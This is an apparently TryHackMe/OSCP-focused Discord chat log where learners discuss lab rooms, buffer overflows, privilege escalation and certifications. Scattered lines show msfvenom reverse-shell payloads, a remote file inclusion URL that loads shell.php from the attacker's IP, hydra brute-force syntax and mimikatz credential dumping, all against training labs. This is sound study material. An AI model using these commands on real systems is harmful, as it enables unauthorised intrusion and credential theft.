@final vault :s

lusty epoch
#

oooo, good luck!

fleet wedge
#

hes gonna smash it

#

#believe

timid crow
#

Okay Im losing my mind here. Brainstorm room ftp is just not letting me pass any arguments, consistently getting "501 Server cannot accept argument" error

#

Any help at all is much appreciated

fleet wedge
#

I'm gonna start it later

timid crow
#

let me know if you have similar issues

fleet wedge
#

Sure :)

light sail
#

Anyone have an issue running the Invoke-Kerberoast.ps1 on corp?

#

Nvm, forgot to import it

fleet wedge
#

@timid crow hey im in brainstorm now, what was your problem about?

timid crow
#

I couldnt get ftp to cooperatee

#

did anon login and that would be fine but wouldnt let me list contents or do anything other than change binary mode or go to passive

#

Just did brainpan though so I still got some BOF practice 🙂

fleet wedge
#

well it works for me actually

timid crow
#

well thats good! Ill give it another try later need a break after brainpan

#

like I said before Im sure its something super simple im missing but its frustrating when its the super simple aspect thats tripping me up and not the actual buffer overflow lol

fleet wedge
#

Does it say the system cannot find the file specified? @timid crow

timid crow
#

yes that was one of the errors

fleet wedge
#

i managed to solve it, just do cd into the directory it says and youll find both @timid crow

undone jacinth
#

Has OSCP always allowed msfvenom and exploit/multi/handler on the exam

#

Thought they were included in the "once per exam" restriction

noble glacier
#

@undone jacinth You're allowed to use msfvenom and multi/handler as many times as you like in the OSCP exam.

undone jacinth
#

nice

final vault
#

the key thing to note with the exam

#

you can't use staged payloads

undone jacinth
#

just started lab access for the second time. already rooted more boxes than my entire lab time previously 🙂

final vault
#

for windows it's a good idea to use windows/shell_reverse_tcp

#

you can tell whether a payload is staged by running msfvenom --list payloads | grep windows/linux

undone jacinth
#

do you even need multi/handler for stageless though

final vault
#

Nope

#

It can be used if you like the feel

#

it's just inefficient compared to catching it on nc

fleet wedge
#

anyone done lord of root without sqlmap

timid crow
#

^

#

would love some help with that myself

stray lynx
#

@fleet wedge what rooms should I do to prepare for Brain Storm oscp room.

#

I can't find any write ups for brain storm or buffer overflow room so struggling quite a bit with radare2

hollow wraith
#

What the remote IP (RHOST) for the OSCP path

cloud flicker
#

@fleet wedge what rooms should I do to prepare for Brain Storm oscp room.
@stray lynx There's a Brainstorm writeup published on the room page

stray lynx
#

Thanks @cloud flicker I swear that wasn't there the other day 👍

cloud flicker
#

Means I can save the two BOF rooms as an actual challenge, too

stray lynx
#

Thank you 😊

hollow wraith
#

What the remote IP (RHOST) for the OSCP path

cloud flicker
#

@hollow wraith what do you mean? Each room has it's own IP after you deploy the machine

hollow wraith
#

Im using my machine IP and Enternal Blue on metasploit is not working

cloud flicker
#

Go to the page of the room you are working on, and make sure the machine is deployed (in Task 1). It should show you the IP address and how long you have left

hollow wraith
cloud flicker
#

The exploit was sent, the log is saying that your target is not vulnerable.

hollow wraith
#

then what the purpose of the lab

rancid vine
#

Try using forceexploit true as it suggests

hollow wraith
#

I figured it out each room has a new VM deployment

vital acorn
#

What does OSCP path contain?
Does the machines have hints in the Oscp path?

bronze zenith
#

What does OSCP path contain?
Does the machines have hints in the Oscp path?
OSCP path contains OSCP alike boxes.
some of them contain hints yes, but some not

final vault
#

Can confirm the oscp path contains pretty decent boxes tbh

small dune
#

@final vault Exam over?

fleet wedge
#

yes

small dune
#

cool!

quasi heron
#

everyone saying results will be in 5 days.. hopefully he will clap it

#

it may delay upto two weeks(as i heard of) due to the current situation going on

#

may be not sure

final vault
#

10 business days

#

Was on my submission email

quasi heron
#

ohk

hollow wraith
#

Is it harder than tryhackme oscp path

fleet wedge
#

of course it is

#

but i think with practice you can do it

final vault
#

Honestly yes and no, the exam isn't as bad as it's made out to be. PWK is harder I'd argue due to the large number of active directory on there

dense citrus
#

Hello my fellow hackers, I rooted SteelMountain already, but I just couldn't figure out the question under Task 4. Can anyone enlighten me a bit?

quasi heron
#

@dense citrus

dense citrus
#

thank you sir, im new here, so apologies for posting that..

quasi heron
#

np

slow iron
#

@fleet wedge Yep I Truly agree with that

#

💯 💯 💯 💯

flat hatch
#

Anyone preping for ecppt here? What path are you doing from tryhackme as prep?

rancid vine
#

I would look at Kenobi, the XSS room, Blue, and maybe Linux privesc. Being as eCPPT actually requires pivoting you’ll want to go through the lab in PTP that covers proxychains a few times.

#

Also the BOF rooms wouldn’t hurt.

alpine peak
#

PTP has a price issue for me

rancid vine
#

So does the unequally expensive OSCP. I paid less for eCPPT than I did OSCP.

#

¯_(ツ)_/¯

#

And I learned a boatload more.

#

I paid a grand for PTP. I paid $1349 for PWK/OSCP.

smoky thorn
#

how @rancid vine even with the discount code from TCM still costs me $1.4k

rancid vine
#

ELS regularly gives discounts that make their content pretty affordable. In this case I bought it on Black Friday, which gave me 25% off and a free upgrade from full to elite.

smoky thorn
rancid vine
#

Think I paid $1,099 in total for it. I actually paid less for PTP and PTS than I did for PWK/OSCP.

#

Can I DM a mod really quick?

chrome valve
#

@rancid vine sure

rancid vine
#

I'm in the US, so I didn't have to pay VAT fortunately.

smoky thorn
#

damn it

rancid vine
smoky thorn
#

oh, alright, sorry for that then

rancid vine
#

No worries.

smoky thorn
#

just enforcing the rules, don't mind me 😦

rancid vine
#

I know. No hard feelings.

smoky thorn
#

thanks for the understanding

rancid vine
#

As a reminder I'll be streaming Steel Mountain in 10 minutes at the link above. Hope to see everyone there.

rancid vine
#

Thanks everyone who stopped by. Hopefully the stream helped!

faint skiff
#

Starting my oscp class on june 21st!

scenic glen
#

So I managed to break boilerctf by sshing to some machine under the machine and now the page I needed doesn't work any more 😄 Now this is an easy fix. Just start another machine. But what if I do this in the exam?

lusty epoch
#

Just got the email through

#

I'm now an OSCP

azure plank
#

Congrats man !! 🥳🥳 @lusty epoch

smoky thorn
#

congrats

lusty epoch
#

thank you ❤️

smoky thorn
quasi heron
#

Congracheulashions ❤️

scenic glen
#

It happend to me 2 days ago when I broke a certain file I was supposed to read from in catdog. Luckly the service uses 2 files and I had a backup. Here there isn't

smoky thorn
#

i think you have the possibility of reseting the boxes

lusty epoch
#

thank you all

smoky thorn
#

no worries

flat hatch
#

Trying to do the steel mountain on oscp path

#

Cant figure out the powershell -c question

#

Can anyone help me?

smoky thorn
#

google is your best bet.

flat hatch
#

Got it

#

Thanks

smoky thorn
#

^^

true quiver
#

Just got the email through
@lusty epoch do u have ceh?

lusty epoch
#

Not yet, thats next on the list though 🙂

arctic wyvern
#

is there a reason for getting ceh at all?

sacred barn
#

@arctic wyvern Some employers look for it as part of their automated or manual application processes as it's still recognised as an 'essential' skillset in a lot of places. It's a requirement for recruitment and/or promotion at some levels in the DoD in the US. Most worthwhile cybersec recruiters will know the value of other certs and experience.

arctic wyvern
#

fair enough doesn't seem worthwhile otherwise. I know my employer thinks it's a joke and would prefer oscp,gpen,gwapt,cissp etc might still help as an HR filter thing but yea general consensus seems to be it's not worth the $ or time

sacred barn
#

Considering the reputation of oscp/gpen and even the eLearnSecurity crowd has been getting some recognition for their training/certs. Going on what I've heard I would put OSCP/GPEN higher

fleet wedge
#

how good is this path?

rancid vine
#

it's good

fleet wedge
#

Wondering if anyone can help me with Skynet? DM Me please 🙂

fleet wedge
#

Why not here? @fleet wedge

#

I don't wanna give away spoilers @fleet wedge

#

oh okay

rancid vine
#

What's the problem you're having?

hazy ruin
#

hey guys, I have a question more than help for room https://tryhackme.com/room/skynet , task#1 . I managed to get the answer pretty quickly with || burp || however, my first attempt was to do so through || hydra || instead with a || http-post-form || I coudn't get the answer as || hydra was telling me that every password were good || is there any of you that did it with || hydra || rather than || burp || ?

obtuse scaffold
#

if hydra says its all good

#

then you haven't specified what a wrong request looks like

hazy ruin
#

yeah that's what I was thinking.

obtuse scaffold
#

on the http-post-form i think it looks like page.php:USER-PASSWORD:incorrect value

#

so if it says "invalid password" in the response

hazy ruin
#

however the wrong the request was giving me " unknown user or password incorrect"

obtuse scaffold
#

you would do page.php:USER-PASSWORD:invalid password

hazy ruin
#

so I put at the end ":unknown user or password incorrect"

#

but was getting the same issue

#

but i must do something wrong

obtuse scaffold
#

you can just put password incorrect

#

you could also you wfuzz or ffuf to d othe same thing

hazy ruin
#

okay

arctic wyvern
#

I had the same issue i'm not sure what was up ended up doing it on burp .I specified Login=Login:Incorrect and it just said everything was valid on hydra 🤷

hazy ruin
#

Yes I tried different error msg at the end of my cmd but wasn't working

#

I prefer to use cmd line than gui

#

so im not so burp

rancid vine
#

For those having difficulty with buffer overflows, would a live stream covering Brainpan be of use to everyone?

arctic wyvern
#

probably too advanced for me at the moment but would certainly love to drop in and watch or catch that vod!

rancid vine
#

Have you ever done any BoF's before?

arctic wyvern
#

not really, I did the bof1 room and the one on codcaper if that one counts but am interested and will spend the time to learn it especially for the oscp but that is still 6+ months out for me

rancid vine
#

So I try to use Ruby when I can, which makes it a whole ton easier.

final vault
#

I went over brainpan about a week ago

#

might be good to see it from someone elses point of view tho

glass sparrow
#

working on privesc not sure why it's not working like in walktrough

#

can I ask someone for clue?

bronze zenith
#

@glass sparrow which room is that?

glass sparrow
#

@glass sparrow which room is that?
@bronze zenith brainpan

bronze zenith
#

@glass sparrow have you found a file which you can sudo without a password?

glass sparrow
#

@glass sparrow have you found a file which you can sudo without a password?
@bronze zenith yes I have

bronze zenith
#

so now just use it to read a manual page for a commad

#

and use Vim command inside of it to spawn a shell

glass sparrow
#

just like walktrough in the internet right?

bronze zenith
#

yup

glass sparrow
#

I got reverse shell, but when I type id my reverse shell is closed

#

listening on [any] 9002 ...
10.10.114.192: inverse host lookup failed: Unknown host
connect to [10.11.5.213] from (UNKNOWN) [10.10.114.192] 42298
id
root@kali:~#

rancid vine
#

ah

#

WHat kind of reverse shell are you trying?

#

I'm gonna do a live stream of this later I think.

glass sparrow
#

WHat kind of reverse shell are you trying?
@rancid vine linux

#

for windows I get cmd, but unable to have proper shell

rancid vine
#

Which one?

#

So the Windows shell naturally doesn't work because it's running Wine on the Linux machine, and you need a proper linux shell.

glass sparrow
#

Which one?
@rancid vine can I dm you?

rancid vine
#

I don't think we are necessarily going to spoil anything here if you want to ask here.

glass sparrow
#

let me try again

frigid star
#

i've rooted hackpark but the last question asks about the original install time, i can't find this can someone let me know what/where it is?

glass sparrow
#

finally rooted brainpan

msfvenom -p linux/x86/shell/reverse_tcp

and listen with

use exploit\multi\handler
set payload linux/x86/shell/reverse_tcp
sonic loom
#

Thanks for the spoiler @rocky narwhalyell_cat

frigid star
#

i used a regex to search the winpeas output for the time/data format specified in the answer but none of them work 🤔

quasi heron
#

@glass sparrow write with | Spoiler Tag |

cloud flicker
#

@frigid star Have a look at systeminfo command in a standard command prompt.

rancid vine
#

I'll be live in 45 minutes at https://www.twitch.tv/themayor11 to cover Brainpan and how you can use Ruby to exploit buffer overflow vulnerabilities. The associated guide is here for you to follow along. Hope to see everyone soon! https://www.cybersecpadawan.com/2020/05/tryhackme-brainpan-ruby-exploitation-no.html

Twitch

Let's Hack! Giveaway when we hit 25 subscribers!

▶ Play video
#

If you’re going to follow along you’ll need to have “Pry”, which should be available in the apt repository.

rancid vine
#

See you in a few. Starting up now.

rancid vine
#

Thanks to everyone who hung out today! Hopefully you were able to learn something. 🙂

vale helm
#

it was great, thanks @rancid vine

rancid vine
#

You're very welcome.

hazy ruin
#

hey guys, im stuck at https://tryhackme.com/room/skynet , task# 3-4 , I finally managed to understand so I grab a || php reverse shell || and im sending this || shell.php || file through the exploit || Cuppa CMS RFI || The problem is, as soon as send || http://10.10.136.154//45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://tunn0IP:8080/shell.php? || my nc gets a connection and then close it right away, why ?

#

oh hang on, I think I understand why ..

#

Alright, there was a misconfiguration line in my || shell.php|| file ... now it works

hexed cloak
#

i used a regex to search the winpeas output for the time/data format specified in the answer but none of them work 🤔
@frigid star got the same problem. Sysinfo could be helpfull

frigid star
#

@hexed cloak yeah aha i got it now, didn't really understand the question at the time but got it now :D

bronze zenith
#

@graceful nexus released? did you mean you submitted it?

#

because it's not public yet

graceful nexus
#

I submitted it and its waiting review

#

But meanwhile you can deploy it as invite only

#

So you can already work on it, I hope soon it will be published

#

It's an epic machine

chrome valve
#

In which case, what's the point in the review process?..

graceful nexus
#

Well I want it to be public not private

#

Should be accessible for all

#

Not just the ones who get invited

#

^^

chrome valve
#

The job of the review process is to determine whether a prospective room is suitable to be released publicly. That is for us (and ultimately the platform owners) to determine, not the creator.

#

Releasing the private link as a workaround kinda makes a mockery of that, no?

graceful nexus
#

If it's considered a mockery shouldn't the share function be disabled than until machine is approved?

#

No offense but its letteraly called 'share'

chrome valve
#

That's there primarily because the site is also used by teachers who don't want their material to be publicly available. It's also used for the testers to join, or for you to share it with any friends who you want to try it.

#

It's not really there as a "Hey everyone, my room hasn't been tested yet, but ignore that and join anyway!"
Kind of a matter of context 🙂

graceful nexus
#

Yea I'm just Sharing the link temporary for people to try

#

Not as a replacement for publication

#

😋

chrome valve
#

And if, heaven forbid, it doesn't pass review?

graceful nexus
#

Than I will do my best to adjust it according to the reviewers feedback until it does

chrome valve
#

(And until that point we're left with a link, posted in the public discord, to a room that shouldn't yet be publicly released, no?)

graceful nexus
#

Ok I'll remove it

#

Had no clue it was against ToS

chrome valve
#

Not sure about the ToS, but it's definitely not really appropriate for the discord. Thank you though 🙂

#

We will get it reviewed soon -- I think Dan is on it 😄

graceful nexus
#

Oki ^^

#

@chrome valve once its reviewed u should give it a try, i think you'll love it

final vault
#

Well it's official now, Just received my email saying I passed OSCP

terse herald
#

😮 PogChamp @final vault. Nice one dude!

sleek glade
#

I rolled the OSCP path without looking what other paths exist. Can I read about the other paths somehow? I only seem to be able to view info abou OSCP once I've enrolled it.

arctic wyvern
#

you can leave and re-enroll in paths whenever you want

vague torrent
#

@sleek glade On the sidebar, do you see "Learning Paths"? Click it and at the top corner it says "Leave path"

sleek glade
#

@vague torrent Ok i'll try to leave it temporarily then. Thanks. I hope my progress does not get lost or something. I just registered 2 hours ago so new to the site.

#

@vague torrent it worked just fine to enter / leave paths 🙂

glass sparrow
#

Well it's official now, Just received my email saying I passed OSCP
@final vault congrats.. how was the exam bro? how was it compared to THM OSCP PATH?

dense mural
#

Hello everyone ! I'm having trouble in the bof1 (buffer overflows) box (in order to complete brainstorm after), i understood the first exemple with integer buffer overflow but I'm really having a bad time trying to overwrite function pointer, anyone for a tip ? ^^'

ember jay
#

task 7?

glass sparrow
#

Hello everyone ! I'm having trouble in the bof1 (buffer overflows) box (in order to complete brainstorm after), i understood the first exemple with integer buffer overflow but I'm really having a bad time trying to overwrite function pointer, anyone for a tip ? ^^'
@litchi.pi#9313 I skip bof1 since it x64 and brainstorm is x86.

dense mural
#

@ember jay Yep exactly

#

Well I wanna learn buffer overflows, no matter if x86 or x64

ember jay
#

same here

#

whats the issue?

glass sparrow
#

I see, perhaps another one can help you.

Well I wanna learn buffer overflows, no matter if x86 or x64
@litchi.pi#9313

dense mural
#

isn't bof1 the absolute beginner buffer overflows box ?

ember jay
#

it is

#

even i did task 7 😛

#

still stuck on 8 tho

dense mural
#

@ember jay When I overflow the buffer, I can't write to pointer properly, i tried "\x00" type binary of the function address i got after modifying the code, tried alphabetical representation, but at best it doesn't change the pointer at all, sometimes it just goes into a far address, worst can be that it gets 12 bytes long instead of 6

#

I struggle to find the relation behind what happend and what I do x')

ember jay
#

do you know pwntools?

#

for python?

#

not really needed actually

#

hold on im booting it up

#

do you use radare?

dense mural
#

nope what's this ?

#

ok just saw radare2 seams powerfull

ember jay
#

you might want to do radare room first

#

you'll need to debug the program

#

to find out where you can overwrite the pointer

#

radare2 and reverse engineering rooms are good starters

dense mural
#

well I got the address 0x400557 of the special function, I just don't know how to overwrite it properly

ember jay
#

how did you get that address?

dense mural
#

Just printf("%p") the pointer

#

Ok understood

#

the "\x05" doesn't pass in stdin s binary

#

it does as characters "" then "x" then "0", then "5"

ember jay
#

\x05 is a hex char

dense mural
#

Yep but i thought with stinput with gets function it would translate the \x thing into a binary intepretation of the following 2 digits as if they were hex formatted

#

so I managed to get it work with echo -e

#

just managing little bugs now ^-^ Hope it'll be fine

#

My god just did it

#

Thank you anyway ! 😄

latent shore
vague torrent
#

Hello everyone. I am on the Kenobi box, I cannot get smbget to work. I know I am supposed to download a file, but I get "Can't open log.txt: File exists" and then, "Failed to download /log.txt: File exists". Does anyone know how to solve it? TIA!

hazy fog
#

Hello. I'm in Brainstorm box and i'm stuck, I can't run the chatserver.exe, I installed a Windows 7 virtual machine and run the program but It only spawns a little window and shuts down inmediatelly, Do I need to install something else in the windows machine?

cloud flicker
#

@hazy fog I can't remember if this Brainpan or Brainstorm but if you got your file from an FTP server, make sure to grab both files...

hazy fog
#

Yes I have both, the .dll file and still won't run

rancid vine
#

Run it from the command line, not by double clicking it.

#

See if that works.

hazy fog
#

:c

hazy fog
#

Now It works, I don't know if it was meant to be like this, but I learned something new

#

I just set transfer type to binary

#

binary name.exe

#

and the get

#

get name.exe

wild tiger
#

waaaw useful room

vital acorn
#

How many ports does the flag -p-400 scans

#

I wrote all the ports because -p- does that and the 400 will be ignored

#

but I get wrong answer
someone knows why?

chrome valve
#

That is not how it works @vital acorn
Nice idea though

#

What does the man page say?

vital acorn
#

scan all ports

chrome valve
#

That's for -p-

#

Look again 🙂

#

@vital acorn

vital acorn
#

but I asked about -p- 🙂

chrome valve
#

You asked about -p-400

#

If you wanted -p- then you already have your answer

#

Easiest thing here is probably just to try it and see what the output is 🤷‍♂️

#

An inquisitive mind goes a long way in this field

chrome valve
#

....

royal drum
#

Hello,
Can anybody tell me when should one go for a certification like oscp.
I am fairly new in cybersecurity.
I have done a few easy rooms in tryhackme and few easy challenges and boxes in hackthebox.

bronze zenith
#

OSCP is not for beginners at all. it's for high intermediate/advanced levels

#

as a beginner, don't worry about certs too much now

#

but eJPT would be a safe bet if you really need one

smoky thorn
#

^

royal drum
#

@bronze zenith Thank you.

vital acorn
#

Hello guys
I am doing the vulunversity

I opened burp
I intercepted the request and send it to intruder in the payload I uploaded the txt file that contains all the extensions that are shown in the example to the payload "Payload Optons simple list"

and in positions i choosed sniper
and I took all the dollar signs and put them only on the file extension file$.png$

and I started the attack

but I got status 200 on all of them

and even when I checked the response for .phtml it shows me "Extension not allowed "

#

why?

jovial lynx
#

@vital acorn Check your requests, do you notice anything strange in your filename?

vital acorn
#

yes

#

yes

rose lodge
#

no

#

no

vital acorn
#

it get some weird charcters instead of .

#

@royal drum

jovial lynx
#

yes, it is url encoding the .

vital acorn
#

@jovial lynx so is it fine?

#

shall i do something?

#

why it's not working

jovial lynx
#

try moving the . outside the $ (and change your list)

#

better yet, at the bottom the payloads tab, uncheck the Payload Encoding option

#

either should work

fleet wedge
#

Has anyone did the THM new windows privesc room?

rancid vine
#

The one TCM made? Yep.

fleet wedge
#

Good for OSCP ?

kind panther
#

If you are a winprivesc noob, yes definitely

#

privesc is what kicked my ass when I took OSCP the most

#

it's really well done

chrome valve
#

Do you have OSCP @kind panther?

kind panther
#

No I failed that shit lol

#

But I took it and got rekt

chrome valve
#

Ah 😅

kind panther
#

I probably learned more in 90 days of lab than I did in a 4 year degree though

chrome valve
#

Good to know

fleet wedge
#

I am taking OSCP in two weeks. I have finished the THM OSCP path. Are there anymore THM boxes that would help with OSCP?

kind panther
#

I just joined THM so I wouldn't know 😕

#

How have you done in the OSCP boxes?

#

I know maybe 2 or 3 genius people on discord that passed OSCP without breaking around 20 boxes. And they are generally long time pentesters professionally

smoky blaze
#

Hey, can someone tell me what the OSCP path is like? Is it worth? Go into detail please, I’m on the edge of buying pro

rancid vine
#

It's a good path. Good mixture of self study and pointed directions to help you understand where you should be headed.

cloud flicker
#

The path here is good if you have or will have access to the PWK materials as a lot of the rooms contain topics that they teach you in the course. So you can read the course, do the room and then the labs as well, it's good additional practice on the topic(s) you need

rancid vine
#

The THM labs are significant more stable than the overpriced labs in PWK. And you aren’t left feeling completely lost and unguided here like you are there.

kind panther
#

tRy hArDeR sometimes just doesn't cut it

vital acorn
#

@cloud flicker
Aren't the rooms the same thing as labs?

arctic wyvern
#

no, my understanding is the labs are all connected and you can pivot among certain network of labs (correct me if i'm wrong)

cloud flicker
#

Yeah the PWK labs are like a simulated network

#

And things from one lab machine might be useful for another down the line, etc etc

proven pivot
#

guys this cours is good or not

rancid vine
#

Anyways, I wouldn't buy it. Anyone peddling dual booting Kali with a USB has completely lost my attention.

fast olive
#

any one have malware analysis material

#

or megaprimers

real sandal
#

Not sure why that's being asked here though, you’re not going to be doing anything like that in OSCP

terse perch
#

Curious, has anyone completed Alfred recently? I have a System shell and not seeing root.txt in the expected location of C:\Windows\System32\config... #offensive-pentesting-path

#

I have reset the box twice, and it is not showing up.

hasty sentinel
#

you need to migrate to a process that has permission to view the file

terse perch
#

Ohhhh ok, sweet. Thank you. I thought because I was "nt authority\system" that I would be able to see it.

terse perch
#

Oh geez, it says it right there in the #4 question of privesc. I blame lack of sleep! lol

thorny oxide
#

why i can't see oscp-path on the site?

quasi heron
#

its changed to Offensive Pentesting i think

thorny oxide
#

ah

terse perch
#

For future reference, is this the best place to ask questions about specific rooms in the OSCP (Offensive Pentesting) Path....?

ionic sun
#

Hi, I've a question about Buffer Overflow Room Task 8, it's broken?

#

I've tried everything and can't get the shell...

remote bear
#

I'm having the same problem, I managed to get a similar exploit working on a different room but this one isn't working at all. tried everything I can think off 😦

fresh valve
#

hey, can you use google at oscp?

noble glacier
#

Yes, you're allowed to use google

fallen herald
#

has anyone done GameZone without sqlmap and metasploit?

rancid vine
#

You could probably figure out the SQLi for it, but that would be tedious and take forever to trial and error.

#

You might be able to guess the parameters I guess.

#

Here's an article on how you can achieve it.

slim summit
#

Can someone confirm if the "Offensive Pentesting" path is the same as the OSCP path? I see the same image but seems like the description and title changed

spark iron
#

Can someone confirm if the "Offensive Pentesting" path is the same as the OSCP path? I see the same image but seems like the description and title changed
@slim summit It is the same yes, just with a new name/description

slim summit
#

@spark iron Awesome! Thanks!

hasty sentinel
#

We changed the path because it's applicable to a lot of different scenarios

#

and the aim is that people use it to prep for various different security related thingd :))

rancid vine
#

Thank goodness for that. OSCP shouldn't be considered the only way into the field. 🙂

fleet wedge
#

Plus I can imagine OffSec probably end up getting funny with y'all about it

rancid vine
#

Being as they have to rely on everyone else to prepare people for their exams, I'm sure they don't mind.

terse perch
#

Alfred was the first room I wasn't able to complete without Metasploit, due to needing to migrate to a process to access a file. Does anyone have any resources on how you can do this without Metasploit?

real sandal
terse perch
#

Thank you...I read that, but wasn't sure how to do the API calls...I will roll up my sleeves and dig in to figure that out.

#

It's probably like everything else, it is intimidating until you actually do it and find out it isn't so bad. lol

real sandal
#

Yeah, wish I could help more but haven't tried doing this manually myself

terse perch
#

No worries at all, just appreciate you reminding me of that.

rancid vine
#

@terse perch you can actually do it without metasploit.

#

I was able to do it yesterday, but it's gonna take some creativity.

#

You can do it without token manipulation as well.

terse perch
#

Are you going to do a video on it by any chance? @rancid vine

bronze zenith
#

stream replay?

#

check his twitch

terse perch
#

Oh, did it get streamed already?

#

Awesome, thank you

bronze zenith
#

i am not sure

terse perch
#

I'll check

bronze zenith
#

👍

rancid vine
#

I haven't done Alfred in that manner. But I could.

#

I can give you the low and dirty here if you want.

#

I literally spent hours trying to do it and only found one way that worked.

terse perch
#

I was able to do everything without Metasploit, using Juicy Potato

#

I just couldn't figure out the process migration part

rancid vine
#

Oh ok. I didn't go that route.

#

I was able to use mimikatz in a reverse shell to impersonate, but couldn't get anywhere with it. In the end I:

#

||lsadump::sam and Rdesktop'd in.||

#

Or xfreerdp'd in

terse perch
#

Oh interesting....and you were able to go in with the process in questions privileges?

rancid vine
#

Can bypass UAC by running as administrator in the GUI

terse perch
#

Ohhhhhh yes, ok that makes sense

rancid vine
#

Can't do that from a command line.

#

Usually

#

So I literally just opened the file.

terse perch
#

I am going to go back through some of the OSCP materials around bypassing UAC and see if that allows a bypass in this instance from the cmd line

rancid vine
#

I doubt they intended someone like me to go to that length.

#

It does not from what I remember.

#

I tried that.

terse perch
#

haha but that is what it's about lol